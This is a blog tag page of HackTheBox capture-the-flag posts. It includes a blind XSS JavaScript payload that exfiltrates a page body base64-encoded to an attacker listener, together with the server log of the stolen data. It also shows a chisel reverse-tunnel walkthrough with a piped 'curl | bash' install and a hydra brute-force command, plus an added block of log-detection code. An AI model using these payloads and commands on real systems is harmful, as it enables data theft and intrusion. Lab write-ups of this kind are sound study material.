Showing posts with the label hackthebox.

Saturday, 13 March 2021

Blind XSS Data Exfiltration

cat 2.js

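// Synchronously fetch the report page from the browser that renders the payload.
var xhr=new XMLHttpRequest();
xhr.open("GET", 'http://gym-club..htb/security_threat/report.php', false);
xhr.send();
// Send the response body, base64-encoded, to the listener as a query value.
var xhr2=new XMLHttpRequest();
xhr2.open("GET", "http://10.10.14.121/aaaa?=" + btoa(xhr.responseText), false);
xhr2.send();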


└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.208 - - [13/Mar/2021 11:54:48] "GET /2.js HTTP/1.1" 200 -
10.10.10.208 - - [13/Mar/2021 11:54:48] code 404, message File not found
10.10.10.208 - - [13/Mar/2021 11:54:48] "GET /aaaa?=PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICA8dGl0bGU+U2VjdXJpdHkgUmVwb3J0PC90aXRsZT4KICA8c3R5bGU+CiAgICB0YWJsZSwgdGgsIHRkIHsKICAgICAgYm9yZGVyOiAxcHggc29saWQgYmxhY2s7CiAgICB9CiAgPC9zdHlsZT4KPC9oZWFkPgo8Ym9keT4KPGg0PkxvZ2dlZCBYU1MgYXR0ZW1wdHM8L2g0Pgo8dGFibGU+CiAgPHRoZWFkPgogICAgPHRyPgogICAgICA8dGQ+VGltZXN0YW1wPC90ZD4KICAgICAgPHRkPlVzZXIgQWdlbnQ8L3RkPgogICAgICA8dGQ+SVAgQWRkcmVzczwvdGQ+CiAgICA8L3RyPgogIDwvdGhlYWQ+Cjx0Ym9keT4KPC90Ym9keT4KPC9ib2R5Pgo8L2h0bWw+Cg== HTTP/1.1" 404 -
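
What the server log above records is a page body leaving the browser as a base64 query value. The following is an added example, not part of the original post, of detection logic that flags and decodes such requests in logs with the same layout. The sample lines, the 192.0.2.x addresses, the function names and the 0.9 printable-byte threshold are constructed assumptions.

```python
import base64
import binascii
import re
from urllib.parse import unquote, urlsplit

# Line layout of Python's http.server request log, as in the capture above.
LOG_RE = re.compile(r'^(\S+) - - \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+" \d{3}')
B64_RE = re.compile(r'[A-Za-z0-9+/_-]{40,}={0,2}')
MIN_PRINTABLE = 0.9  # assumed threshold: share of decoded bytes that are text

def decode_if_text(value):
    """Return decoded text if value is base64 of mostly printable bytes, else None."""
    if not B64_RE.fullmatch(value):
        return None
    # Accept the URL-safe alphabet too and restore any stripped padding.
    std = value.replace("-", "+").replace("_", "/") + "=" * (-len(value) % 4)
    try:
        raw = base64.b64decode(std, validate=True)
    except (binascii.Error, ValueError):
        return None
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in raw)
    if not raw or printable / len(raw) < MIN_PRINTABLE:
        return None
    return raw.decode("utf-8", errors="replace")

def find_encoded_queries(log_lines):
    """Return (client, path, decoded_text) for requests with base64 text in the query."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # e.g. the "code 404, message ..." lines
        client, target = m.groups()
        parts = urlsplit(target)
        # Split by hand: parse_qsl would turn the '+' of base64 into spaces.
        for pair in parts.query.split("&"):
            text = decode_if_text(unquote(pair.partition("=")[2]))
            if text is not None:
                hits.append((client, parts.path, text))
    return hits

# Constructed sample log: documentation addresses and a made-up page body.
_BODY = b"<!DOCTYPE html>\n<html><head><title>Constructed sample</title></head></html>\n"
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Mar/2021 11:54:48] "GET /2.js HTTP/1.1" 200 -',
    '192.0.2.10 - - [13/Mar/2021 11:54:48] code 404, message File not found',
    '192.0.2.10 - - [13/Mar/2021 11:54:48] "GET /aaaa?=%s HTTP/1.1" 404 -' % base64.b64encode(_BODY).decode(),
    '192.0.2.20 - - [13/Mar/2021 11:55:02] "GET /app.js?v=%s HTTP/1.1" 200 -' % ("a1b2" * 10),
]
```

Calling `find_encoded_queries(SAMPLE_LOG)` reports only the `/aaaa` request; the long `v=` token is valid base64 but decodes to non-text bytes and is ignored.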

Monday, 25 January 2021

TCP/UDP reverse tunnel, transported over HTTP, secured via SSH - chisel

#### CHISEL INSTALL

curl https://i.jpillora.com/chisel! | bash

## copy to victim server: 
www-data@passage:/tmp$ wget http://10.10.14.143/chisel
wget http://10.10.14.143/chisel
--2021-01-25 08:55:34--  http://10.10.14.143/chisel
Connecting to 10.10.14.143:80... failed: Connection refused.
www-data@passage:/tmp$ wget http://10.10.14.143:8000/chisel
wget http://10.10.14.143:8000/chisel
--2021-01-25 08:55:47--  http://10.10.14.143:8000/chisel
Connecting to 10.10.14.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8704000 (8.3M) [application/octet-stream]
Saving to: 'chisel'

chisel              100%[===================>]   8.30M  5.33MB/s    in 1.6s    

2021-01-25 08:55:49 (5.33 MB/s) - 'chisel' saved [8704000/8704000]

www-data@passage:/tmp$ 


##  my computer:
chisel server -p 9999 --reverse

## victim computer 
./chisel client 10.10.14.143:9999 R:631:localhost:631

##############



hydra -l paul -P /usr/share/wordlists/rockyou.txt -s 631 -f 127.0.0.1 http-get /admin/log/error_log

Sunday, 22 March 2020

HackTheBox - Sauna - WriteUP

My log from the attack on the Sauna machine on HackTheBox.
The beginning was long. All fun is enumeration. Start by enumerating employee accounts. The website turns out to be useful.


Wednesday, 16 October 2019

Obtaining an IPv6 address from FTP IPv4 using FXP (RFC 2428)


One of the tasks from HackTheBox gave me such a puzzle to solve. It is possible. I spent some time on this because I didn't issue the LIST command. See how it is done correctly :)


Thursday, 12 September 2019

HackTheBox - Emdee five for life - WriteUp


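import requests
import hashlib


# Use one session so any cookie set by the GET is sent back with the POST.
s = requests.Session()
r = s.get("http://docker.hackthebox.eu:37358")
print(r.status_code)
print(r.text)


# Cut the challenge string out of the HTML, between the heading and the closing </h3>.
postString0 = r.text.split("\n",5)[5]
postString1 = postString0.split("<h1 align='center'>MD5 encrypt this string</h1><h3 align='center'>",1)[1]
kodzik = postString1.split("</h3>",1)[0]


print("kodzik from website:")
print(kodzik)


# MD5 of the challenge string as a hex digest.
kodzikMd5 = hashlib.md5(kodzik.encode('utf-8')).hexdigest()

print("kodzik md5:")
print(kodzikMd5)


# Send the digest as the form field "hash"; the string 'hash=kodzikMd5'
# would post the literal variable name instead of its value.
p5 = {'hash': kodzikMd5}

r5 = s.post("http://docker.hackthebox.eu:37358", data=p5)
print(r5.text)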